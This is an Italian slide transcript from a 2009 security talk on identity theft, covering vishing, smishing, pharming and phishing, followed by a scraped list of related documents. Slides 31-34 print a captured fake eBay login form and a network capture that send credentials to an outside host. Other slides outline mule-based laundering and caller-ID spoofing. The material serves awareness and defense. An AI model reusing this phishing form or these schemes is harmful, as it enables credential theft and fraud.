Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009"

Transcript

1 Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009 Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica ed Ingegneria dell'informazione e delle Telecomunicazioni

2 Furto di identità Social Engineering Phishing Vishing (Voice Phishing) Smishing (Sms phishing) Pharming (Attacchi DNS)

3 Social Engineering Studio del comportamento individuale al fine di carpire informazioni Migliore tecnica di crittanalisi attuale Footprinting, studio dello stile vocale, oppressione psicologica, tecnica della riconoscenza, richiesta di aiuto, boxing, etc. Kevin Mitnick, The Art of Deception

4 Vishing Voice Phishing Basato su Voice messaging IP per praticare attacchi di social engineering volti al furto di dati (personali, finanziari, confidenziali) Perchè IP? Linee fisse sono controllabili meglio (individuazione del chiamante), inoltre in questo modo posso fare chiamate da tutto il mondo gratis.

5 Vishing: motivi del successo 1) maggior fiducia sul vettore telefono piuttosto che sulla mail 2) Maggior diffusione del telefono piuttosto che della mail (soprattutto anziani); 3) Accettazione generalizzata dei sistemi a risponditore automatico. 4) Modalità di comunicazione sincrona (rapidità d'azione) 5) Maggior personalizzazione del messaggio che costituisce l'attacco 6) Call-center <-> co.co.pro. <-> accento straniero

6 Vishing: informazioni carpite Informazioni richieste:compleanno, dettagli carta di credito e bancomat (expiration date, security codes, pin), documenti (passaporto, National Ids). 1) Accesso ai conti bancari Utilizzi dell'attacco: 2) Acquisto beni su Internet e nel mondo reale 3) Trasferimento denaro e riciclaggio (vedi prossima slide) Falsificazione documenti (ad un controllo telematico tutto è ok).

7 Scenario: riciclaggio Ad Alice (Italia) vengono rubate le credenziali di accesso al conto Bob viene convinto tramite vishing ad effettuare transazioni Italia Estero trattenendosi il 10% Eve riceve da Bob il 90% dei soldi rubati ad Alice. Vantaggi: Italia Italia non ci sono controlli da parte della banca Le indagini si concentrano su Bob inizialmente (guadagno di tempo).

8 Vishing: technological benefit Telefoni raggiunti da ogni parte del mondo (e.g. Skype?) Costi minimi Mascheramento o impersonificazione del caller-id War dialing (automatizzazione), con creazione software di call-center fake. Difficoltà a effettuare il filtraggio (come invece avviene per il phishing) Proxy per il routing internazionale dei messaggi

9 Vishing: technoogical benefits Malware per diffusione e scalabilità del message delivery Riconoscimento dei toni per acquisire numeri Riconoscimento vocale automatizzato per acquisire altri dati personali

10 Vishing: esempio tramite Attacco simile al phishing, al posto dell'url c'è un numero di telefono da chiamare (Nazionale! Vedi skype) Caro cliente,... Banca XXX per proteggere i tuoi soldi ha bloccato il conto. Chiama lo 02/ per verificare i tuoi dati. Si esegue la chiamata, 4 o più scelte: 1 per movimenti e saldo conto 2 per effettuare transazioni 3 per sbloccare un conto bloccato 0 per parlare con un operatore

11 Vishing: Dobbiamo verificare... e in rapida successione: Numero di conto Data e luogo di nascita Numero di carta d'identità Pin e codici vari per l'accesso via Internet Alla fine viene effettuato il trasferimento verso operatore: Vero, rerouting verso call center reale Fake, cade la linea

12 Skype:numero regionale

13 Vishing: esempio voic Spingono a effettuare risposte immediate basate su bisogni effettivi: Come da lei richiesto domani sarà chiusa l'erogazione di corrente elettrica presso la sua abitazione. Per il saldo finale, le informazioni relative e per parlare con un operatore chiami il 02/ Varianti e add-ons: Si chiama un numero a pagamento (899...) Si mettono in piedi veri call-center alternativi ai risponditori automatici

14 Vishing: varianti Interviste a pagamento, al termine si chiedono tutti i dettagli (e qualcosa in più :-) del conto corrente per l'accredito Dumpster boxing: individuato il soggetto si cerca nel suo trash (es. le ricevute dei prelievi bancomat) e si eseguono attacchi personalizzati basati su conoscenza di fatti riservati (es. num. Bancomat o carta di credito)

15 Vishing:tracciabilità Chiamate uscenti: Fake caller-id Chiamate voip da internet, stessa difficoltà che tracciare un pc che commette abusi Chiamate entranti verso un call-center fake: Linea telefonica registrata con documenti falsi Linea voip (es. Skype): riesco a trovare gli estremi della carta di credito del criminale e basta User skype rubato, addebiti pagati con carte rubate.

16 Vishing: mms e sms E' stata richiesta l'apertura di un nuovo fido su Banca XXX; in caso questa richiesta non sia autorizzata da lei contattare 02/ Da proprio provider telefonico: hai superato il limite di traffico gratuito del mese: rispondi con il tuo codice della carta di credito per avere ulteriore traffico a 3euro. Scarica loghi, suonerie, gratuitamente!!!

17 Smishing: SMS Phishing Invio di sms fake tramite software ad-hoc che consente la manipolazione del mittente: software firesms siti smsforge.net, (da verificare) Attenzione, chiami il numero xxxxxxx di Servizi Interbancari per verificare la transazione della sua carta di credito al fine di evitarne usi fraudolenti Richiesta codici (voce preregistrata) e successiva attesa operatore non disponibile.

18 Smishing: converging technologies Lo hook (entità che cattura le informazioni) può essere sia un sito web (phishing) che un call-center (vishing) Si possono usare sia i telefoni sms che i gateway web per inviare i messaggi sms fake Si sono visti troiani (eliles.a) che si installano sul pc, si propagano come worm, tramite sms gateway fanno smishing con il target di inserire un troiano dentro Nokia N60.

19 Smishing: SMS Phising Motivi del successo: accettazione del cellulare come mezzo più riservato della posta elettronica (falso, war dialing, elenchi su web, vendita usato etc.) Accettazione della chiamata da/verso call center più facilmente che non contatto tramite web Truffa ai danni di Carta Sì, usando come mittente TIM o VISA.

20 Pharming Dopo attacco (spoofed server) Il server spoofed si presenta identico in tutte le sue forme a quello originale!! (normale phishing)

21 Pharming: motivi successo Di solito si controllano i link: https://www.posteitaliane.ru No possibilità di controllo (dovrei interrogare DNS autonomi) Siti clonati perfettamente (ad es. acquistando un conto vero e facendo prove).

22 Pharming: info rubate Normale transazione: user, password, pincode vari richiesti durante la transazione Dati aggiuntivi richiesti ad-hoc: anagrafica, altri conti, assicurazioni, familiari etc.

23 Pharming: tecnologia Intrusione e modifica del Dns del provider della banca o via social engineering o tramite attacco diretto Dns cache poisoning sul provider della vittima Inserimento di troiano nel pc vittima e modifica del file c:\windows\system32\drivers\etc Inserimento di troiano nel pc vittima e modifica del registro con cambiamenti dei dns predefiniti.

24 Pharming: difese Buon antivirus Personal Firewall con controllo di accesso siti (quasi infattibile nella realtà Controllo dei certificati digitali offerti dai server (quasi certamente non eseguito)

25 Pharming: varianti e to-do Man in the middle attacks: le informazioni vengono carpite, usate per autenticarsi sul server vero e di conseguenza mostrate all'utente, aumentando la confidenza e la sensazione di sicurezza dello stesso.

26 Phishing Attacco proveniente da Solite tecniche di social engineering (il conto verrà chiuso, ci sono degli addebiti anomali, controllo delle credenziali etc.)

27 Phishing: tecnologia SMTP sender address spoofing Riproduzione fedele dei loghi e indirizzi di posta nella mail Riproduzione fedele del layout del sito (e.g. Usando ffline browsers) Offuscamento dei link (banale, oppure utilizzando indirizzi ip al posto dei link, o indirizzi ip in notazione tutta numerica

28 Phishing: esempio pratico

29 Phihing: analisi header Received: from nameserver.ge.cnr.it (nameserver.ge.cnr.it [ ]) by gentoo2.ieiit.cnr.it (Postfix) with ESMTP id 002C41FB6AD for Wed, 2 Jan :15: (CET) X-Greylist: delayed 548 seconds by postgrey-1.16 at nameserver.ge.cnr.it; Wed, 02 Jan :30:19 CET Received: from mail.ispotclothing.com (unknown [ ]) by nameserver.ge.cnr.it (Postfix) with ESMTP id 859CB1827B for Wed, 2 Jan :30: (CET) Received: from User by mail.ispotclothing.com with SMTP (Code-Crafters Ability Mail Server 2.55); Wed, 02 Jan :21: Reply-To: it.ge.cnr.it> From: "Utente di ebay: goldenmovie" Subject: Hai ricevuto una domanda sull'oggetto Date: Wed, 2 Jan :21:

30 Phishing: esempio pratico Contenuto di zmail.ru:

31 Phishing: analisi codice <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/tr/html4/loose.dtd"><html> <meta http-equiv="content-type" content="text/html; charset=iso "><!--srcid: SignIn--> <title>benvenuto su ebay</title><script language="javascript"><!-- var pagename = "PageSignIn"; //--></script><script language="javascript"><!--... href="https://secureinclude.ebaystatic.com/css/e543/it/areatitledeployme nt_ssl_e5431it.css" media="all" rel="stylesheet"> </head> <body bgcolor="#ffffff" onload="doframesbuster();">......

32 Phishing: analisi codice <form method="post" name="signinform" onsubmit="setoptimcookie();" style="margin:0px" action=http://www2.fiberbit.net/form/mailto.cgi method=post enctype=x-www-form-urlencoded> <INPUT type=hidden value=yahoo name=mail_from> <INPUT type=hidden name=mail_to> <INPUT type=hidden value=ita name=mail_subject> <INPUT type=hidden value=http://www.ebay.it/name=next_page> <INPUT type=hidden value=0 name=smauthreason> <INPUT type=hidden value=http://olgutza.nm.ru/bpol/cartepre/grazie.txt name=target>... ID utente <td><input type="text" name="userid" maxlength="64" tabindex="1" value="" size="27"></td> <a name="password" style="text-decoration:none">password </a></td> <td><input type="password" name="pass" maxlength="64" value="" tabindex="2" size="27"></td>

33 Phishing: analisi diretta Basta perder tempo! Address A Address B Packets Bytes Packets A->B Bytes A->B Packets A<-B Bytes A<-B Risoluzione Tipo local_pc pages.ebay.it inversa local_pc www2.kjps.net inversa poi con la diretta scopro local_pc www2.fiberbit.net local_pc local_pc local_pc Akamai whois, inversa local_pc local_pc local_pc

34 Analisi pcap POST /form/mailto.cgi HTTP/1.1 Host: www2.fiberbit.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 228 Mail_From=Yahoo&Mail_To=cicciobello570%40hotmail.it&Mail_Subject=ITA&Next_Page=http%3A%2F%2Fwww.ebay.it %2F&SMAUTHREASON=0&TARGET=http%3A%2F%2Folgutza.nm.ru%2Fbpol%2Fcartepre%2Fgrazie.txt&userid=ci cciociccio&pass=ciaobello HTTP/ Found Date: Wed, 02 Jan :28:55 GMT Server: Apache/ (Unix) Location: Keep-Alive: timeout=2, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso

Network Troubleshooting 101

Network Troubleshooting 101 ICT Security n. 16, Ottobre 2003 p. 1 di 5 Network Troubleshooting 101 Il titolo prettamente americano vuole rispondere al momento di panico capitato a tutti quando qualche cosa non funziona più: si è

Dettagli

Sicurezza delle applicazioni web: protocollo HTTP

Sicurezza delle applicazioni web: protocollo HTTP Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: protocollo HTTP Alessandro Reina Aristide Fattori

Dettagli

Sicurezza delle applicazioni web: protocollo HTTP

Sicurezza delle applicazioni web: protocollo HTTP Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2009/2010 Sicurezza delle applicazioni web: protocollo HTTP Roberto Paleari roberto@security.dico.unimi.it

Dettagli

Navigare in sicurezza

Navigare in sicurezza Navigare in sicurezza Recentemente sono state inviate email apparentemente di BNL (negli esempi riportati compare come mittente "BNL Banca"), che invitano a fornire le credenziali di accesso all'area clienti

Dettagli

SICUREZZA INFORMATICA MINACCE

SICUREZZA INFORMATICA MINACCE SICUREZZA INFORMATICA MINACCE Come evitare gli attacchi di phishing e Social Engineering Ver.1.0, 19 febbraio 2015 2 Pagina lasciata intenzionalmente bianca 1. CHE COSA È UN ATTACCO DI SOCIAL ENGINEERING?

Dettagli

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif Web e HTTP Terminologia Una pagina web consiste di oggetti Un oggetto può essere un file HTML, una immagine JPG, ecc. Una pagina web consiste di un file HTML base che fa riferimento a diversi oggetti al

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE

UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE Marco Gallone Sella Holding Banca 28 Novembre 2006 Il Gruppo Banca Sella ed il Commercio Elettronico Dal 1996 Principal Member dei circuiti Visa e MasterCard

Dettagli

Moneta Elettronica Utilizzo Vantaggi Sicurezza. A cura di Fabrizio Rossi

Moneta Elettronica Utilizzo Vantaggi Sicurezza. A cura di Fabrizio Rossi Moneta Elettronica Utilizzo Vantaggi Sicurezza A cura di Fabrizio Rossi > Home Banking > ATM (comunemente chiamati "Bancomat terminali self per prelevare contanti) > Carte di Credito > POS (Incasso pagamenti)

Dettagli

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi

Dettagli

GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL. Come proteggersi dal PHISHING - Decalogo ABI Lab per i clienti

GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL. Come proteggersi dal PHISHING - Decalogo ABI Lab per i clienti GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL Il phishing consiste nella creazione e nell uso di e-mail e siti web ideati per apparire come e-mail e siti web istituzionali di organizzazioni

Dettagli

INFORMATICA DISTRIBUITA. lez 5 World Wide Web (cont)

INFORMATICA DISTRIBUITA. lez 5 World Wide Web (cont) INFORMATICA DISTRIBUITA prof. lez 5 World Wide Web (cont) Università degli Studi di Milano Scienze e Tecnologie della Comunicazione Musicale a.a. 2009-2010 Protocolli usabili nelle URL http: ftp: : http://www.dico.unimi.it/

Dettagli

Architetture Web Protocolli di Comunicazione

Architetture Web Protocolli di Comunicazione Architetture Web Protocolli di Comunicazione Alessandro Martinelli alessandro.martinelli@unipv.it 10 Maggio 2011 Architetture Web Architetture Web Protocolli di Comunicazione Il Client Side Il Server Side

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO

USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO LA POLIZIA POSTALE E DELLE COMUNICAZIONI La Polizia Postale e delle Comunicazioni si occupa della prevenzione e repressione di tutti i reati commessi per il

Dettagli

Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto

Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto CYBER RISK: RISCHI E TUTELA PER LE IMPRESE Confindustria Vicenza 26/02/2015 Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto Suddivisione territoriale Compartimenti e Sezioni

Dettagli

VoIP e. via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE

VoIP e. via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE VoIP e via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE VoIP è Voice over IP (Voce tramite protocollo Internet), acronimo VoIP, è una tecnologia che rende possibile effettuare una conversazione telefonica

Dettagli

Attività: Indovina come ti pago. Materiale: schede Strumenti di pagamento da stampare, fotocopiare e distribuire ai gruppi

Attività: Indovina come ti pago. Materiale: schede Strumenti di pagamento da stampare, fotocopiare e distribuire ai gruppi Attività: Indovina come ti pago Materiale: schede Strumenti di pagamento da stampare, fotocopiare e distribuire ai gruppi 1 La carta di debito - il bancomat Il bancomat è uno strumento di pagamento, collegato

Dettagli

Benvenuto in Fineco. Guida all attivazione dei servizi

Benvenuto in Fineco. Guida all attivazione dei servizi Benvenuto in Fineco Guida all attivazione dei servizi Entra in FIneco I servizi di Fineco 1 RICEVI I CODICI Codice attivazione Codice utente 2 ATTIVA I CODICI Password web Password telefonica PIN dispositivo

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

Pagamenti elettronici

Pagamenti elettronici Pagamenti elettronici Guida alla sicurezza Obiettivo di questa guida è informarti sugli strumenti che la Cassa Rurale BCC di Treviglio ti mette a disposizione per gestire con ancor più sicurezza le operazioni

Dettagli

Uso di ACL per la protezione di una rete

Uso di ACL per la protezione di una rete Uso di ACL per la protezione di una rete Claudio Telmon Dipertimento di Informatica Università di Pisa Claudio Telmon - ACL per la protezione-1 Raccolta di informazioni Raccolta

Dettagli

Architetture Applicative Il Web

Architetture Applicative Il Web Architetture Applicative Il Web Alessandro Martinelli alessandro.martinelli@unipv.it 18 Marzo 2014 Architetture Architetture Web L Architettura Client-Server HTTP Protocolli di Comunicazione Fondamenti

Dettagli

Attacchi Web - Introduzione alla sicurezza nelle applicazioni Web

Attacchi Web - Introduzione alla sicurezza nelle applicazioni Web Attacchi Web Introduzione alla sicurezza nelle applicazioni Web Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento

Dettagli

Guida alla Prima Configurazione dei Servizi

Guida alla Prima Configurazione dei Servizi Guida alla Prima Configurazione dei Servizi Guida alla Prima Configurazione dei Servizi 1 Indice 1 Configurazione del Centralino-Numero di Servizio...3 1.1 A. Servizio Cortesia e Gestione Code...5 1.2

Dettagli

INCONTRO DI STUDIO Sistemi di pagamento: la difesa dal furto di identità, profili normativi e i nuovi scenari tecnologici. Roma 22 maggio 2013

INCONTRO DI STUDIO Sistemi di pagamento: la difesa dal furto di identità, profili normativi e i nuovi scenari tecnologici. Roma 22 maggio 2013 Responding to Life INCONTRO DI STUDIO Sistemi di pagamento: la difesa dal furto di identità, profili normativi e i nuovi scenari tecnologici Roma 22 maggio 2013 Il Furto d identità e gli italiani: tra

Dettagli

2013 Skebby. Tutti i diritti riservati.

2013 Skebby. Tutti i diritti riservati. Disclaimer: "# $%&'(&)'%# *("# +,(-(&'(# *%$).(&'%#,/++,(-(&'/# 0"#.(1"0%# *(""20&3%,./40%&(# /# &%-',/# disposizione. Abbiamo fatto del nostro meglio per assicurare accuratezza e correttezza delle informazioni

Dettagli

Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall

Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall Cosa serve per collegarsi? Un PC Un modem (router) Cosa serve per navigare? Un abbonamento

Dettagli

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA Torino, 10 dicembre 2013 LA POLIZIA POSTALE E DELLE COMUNICAZIONI 20 COMPARTIMENTI 80 SEZIONI 2000 OPERATORI Contrasto Reati Informatici

Dettagli

CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015)

CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015) serie Tecnica n. Codice Attività: TS 3015 CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015) Scheda di segnalazione sul Phishing Si fa riferimento alla lettera circolare ABI TS/004496 del 12/09/03

Dettagli

PHISHING 1.0 COSE' E PERCHE' 1.1 Definizione e scopo 1.2 Da non confondere 2.0 TIPI DI PHISHING

PHISHING 1.0 COSE' E PERCHE' 1.1 Definizione e scopo 1.2 Da non confondere 2.0 TIPI DI PHISHING PHISHING 1.0 COSE' E PERCHE' 1.1 Definizione e scopo 1.2 Da non confondere 2.0 TIPI DI PHISHING 2.1 Spear Phishing 2.2 Clone Phishing 2.3 Phone Phishing 3.0 SITI WEB FAKE 3.1 Come vengono creati 3.2 Come

Dettagli

url uniform resource locator

url uniform resource locator url uniform resource locator m. patrignani nota di copyright questo insieme di slides è protetto dalle leggi sul copyright il titolo ed il copyright relativi alle slides (inclusi, ma non limitatamente,

Dettagli

Colloquio di informatica (5 crediti)

Colloquio di informatica (5 crediti) Università degli studi della Tuscia Dipartimento di Scienze Ecologiche e Biologiche Corso di laurea in Scienze Ambientali A.A. 2013-2014 - II semestre Colloquio di informatica (5 crediti) Prof. Pier Giorgio

Dettagli

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Indice 2 Approfondamenti 3 Caro Lettore, PattiChiari è il Consorzio attraverso il quale l industria bancaria italiana lavora

Dettagli

SICUREZZA. Sistemi Operativi. Sicurezza

SICUREZZA. Sistemi Operativi. Sicurezza SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1 SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Risparmio Postale Online

Risparmio Postale Online Istruzioni Operative RPOL Ed. Gennaio 2013 Risparmio Postale Online Istruzioni operative Poste Italiane S.p.A. - Società con socio unico Patrimonio BancoPosta 1 di 8 Caratteristiche del servizio... 3 Chiavi

Dettagli

- SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK

- SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK - SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK La sicurezza del servizio InBank è garantita dall'utilizzo di tecniche certificate da enti internazionali per una comunicazione in Internet protetta.

Dettagli

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Caro Lettore, PattiChiari è il Consorzio attraverso il quale l industria bancaria italiana lavora per semplificare l uso dei

Dettagli

Sicurezza: credenziali, protocolli sicuri, virus, backup

Sicurezza: credenziali, protocolli sicuri, virus, backup Sicurezza: credenziali, protocolli sicuri, virus, backup La sicurezza informatica Il tema della sicurezza informatica riguarda tutte le componenti del sistema informatico: l hardware, il software, i dati,

Dettagli

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Quadro generale: Internet Services Provider (ISP) Server WEB World Wide Web Rete ad alta

Dettagli

Infrastrutture e Protocolli per Internet Laboratorio 1

Infrastrutture e Protocolli per Internet Laboratorio 1 Advanced Network Technologies Laboratory Infrastrutture e Protocolli per Internet Laboratorio 1 Stefano Napoli Alberto Pollastro Politecnico di Milano Laboratori Responsabili di Laboratorio: Stefano Napoli

Dettagli

SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it

SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI Fabrizio Cassoni Content Security Manager fc@symbolic.it Agenda: Introduzione a FSAV Client Security Nuove feature Gestione tramite Policy Manager Introduzione

Dettagli

Sicurezza e Rischi. Mi è arrivata una mail con oggetto: ATTENZIONE!!! chiusura sistematica del tuo conto VIRGILIO. Come proteggersi dallo Spam

Sicurezza e Rischi. Mi è arrivata una mail con oggetto: ATTENZIONE!!! chiusura sistematica del tuo conto VIRGILIO. Come proteggersi dallo Spam Sicurezza e Rischi Mi è arrivata una mail con oggetto: ATTENZIONE!!! chiusura sistematica del tuo conto VIRGILIO Come proteggersi dallo Spam Come proteggersi da virus, trojan e malware Ci sono limitazioni

Dettagli

Modulo 12 Sicurezza informatica

Modulo 12 Sicurezza informatica Modulo 12 Sicurezza informatica Il presente modulo definisce i concetti e le competenze fondamentali per comprendere l uso sicuro dell ICT nelle attività quotidiane e per utilizzare tecniche e applicazioni

Dettagli

Appendice:: Spunti sulla sicurezza e Internet Materiale fuori programma dedicato rigorosamente solo ai curiosi. prof.

Appendice:: Spunti sulla sicurezza e Internet Materiale fuori programma dedicato rigorosamente solo ai curiosi. prof. Operatore Informatico Giuridico Informatica Giuridica di Base A.A 2003/2004 I Semestre Appendice:: Spunti sulla sicurezza e Internet Materiale fuori programma dedicato rigorosamente solo ai curiosi prof.

Dettagli

Quali diritti per i bambini? RAGAZZI NELLA RETE. Navigazione sicura: strumenti e consigli

Quali diritti per i bambini? RAGAZZI NELLA RETE. Navigazione sicura: strumenti e consigli Quali diritti per i bambini? RAGAZZI NELLA RETE Navigazione sicura: strumenti e consigli Gianluigi Trento 30/11/2010 Alcune considerazioni Terre des hommes, organizzazione tra le più attive nella protezione

Dettagli

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam?

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Perché questo corso - Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Cosa spiegheremo - protocolli e le tecnologie internet - quali sono

Dettagli

Provider e Mail server

Provider e Mail server Il servizio di elettronica Provider e Mail server Il servizio di elettronica o e-mail nasce per scambiarsi messaggi di puro testo o altri tipi di informazioni (file di immagini, video, ecc.) fra utenti

Dettagli

INFORMATIVA CLIENTELA CartaBcc

INFORMATIVA CLIENTELA CartaBcc INFORMATIVA CLIENTELA CartaBcc L utilizzo di internet quale veicolo per l accesso ad informazioni od esecuzione di operazioni finanziarie presuppone una seppur minimale conoscenza dei rischi connessi all

Dettagli

- Corso di computer -

- Corso di computer - - Corso di computer - @ Cantiere Sociale K100-Fuegos Laboratorio organizzato da T-hoster.com www.t-hoster.com info@t-hoster.com La posta elettronica La Posta Elettronica è un servizio internet grazie al

Dettagli

Con un bonifico da qualsiasi banca o Banco Posta utilizzando le seguenti coordinate:

Con un bonifico da qualsiasi banca o Banco Posta utilizzando le seguenti coordinate: FAQ LOTTOMATICARD 1- Cos è la Carta Lottomaticard? 2- Dove e come posso acquistarla? 3- Quanto costa? 4- Come posso ricaricare la carta? 5- Dove posso controllare il saldo ed i movimenti della mia carta?

Dettagli

LINKSYS SPA922 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP

LINKSYS SPA922 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP LINKSYS SPA922 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP Linksys SPA922 - Guida alla Configurazione EUTELIAVOIP Rev1-0 pag.2 INDICE SCOPO...3 COLLEGAMENTO FISICO APPARATO...3 ACCESSO ALL ADMINISTRATOR WEB

Dettagli

WWW.MISONOPERSA.IT 18 marzo 2014 Cenni sulla sicurezza Daniela Barbera SAX srl

WWW.MISONOPERSA.IT 18 marzo 2014 Cenni sulla sicurezza Daniela Barbera SAX srl WWW.MISONOPERSA.IT 18 marzo 2014 Cenni sulla sicurezza Daniela Barbera SAX srl Sotto attacco!! Malware - Trojan Horse Spyware - Adware Phishing - Defacement Furto di identità Perdita di dati Danni di immagine

Dettagli

L'INNOVAZIONE NELLE TUE MANI

